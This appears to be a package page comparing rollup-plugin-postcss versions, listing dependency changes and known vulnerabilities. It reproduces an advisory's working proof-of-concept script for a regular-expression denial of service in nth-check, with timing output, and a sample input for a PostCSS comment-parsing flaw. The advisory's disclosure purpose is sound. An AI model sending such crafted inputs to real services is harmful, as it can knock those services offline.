Rollup Plugin PostCSS version 2.8.1 introduces a few key updates compared to version 2.6.4, making it a worthwhile upgrade for developers using Rollup for bundling and PostCSS for CSS processing. The most notable change lies in the dependencies. Version 2.8.1 updates postcss-modules from version 1.5.0 to version 2.0.0, and bumps resolve from 1.15.1 to 1.16.1. Additionally, it includes a new dev dependency sugarss at version 2.0.0. While these changes might seem minor, they could bring important bug fixes, performance improvements, or new features bundled in the new major postcss-modules. Developers utilizing CSS Modules in their PostCSS workflow should particularly note this adjustment. As for the version resolve, which is heavily used for module resolution, the update can bring more accurate or optimized module resolving, an important aspect for larger projects that depend on a complex dependency tree.
Furthermore, the update includes internal improvements. Although the unpacked size slightly decreases from 37996 to 37934, indicating some potential optimization, note that is normal to have these minor size fluctuations even without explicit code changes. More importantly, version 2.8.1 uses a newer version of rollup in the devDependencies, bumping it from 1.32.1 to 2.6.1. This suggests that the plugin is now tested against more recent Rollup versions, ensuring better compatibility and stability.
All the vulnerabilities related to the version 2.8.1 of the package
Inefficient Regular Expression Complexity in nth-check
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.
The ReDoS vulnerabilities of the regex are mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? with quantified overlapping adjacency and can be exploited with the following code.
Proof of Concept
// PoC.js
var nthCheck = require("nth-check")
for(var i = 1; i <= 50000; i++) {
var time = Date.now();
var attack_str = '2n' + ' '.repeat(i*10000)+"!";
try {
nthCheck.parse(attack_str)
}
catch(err) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
}
The Output
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.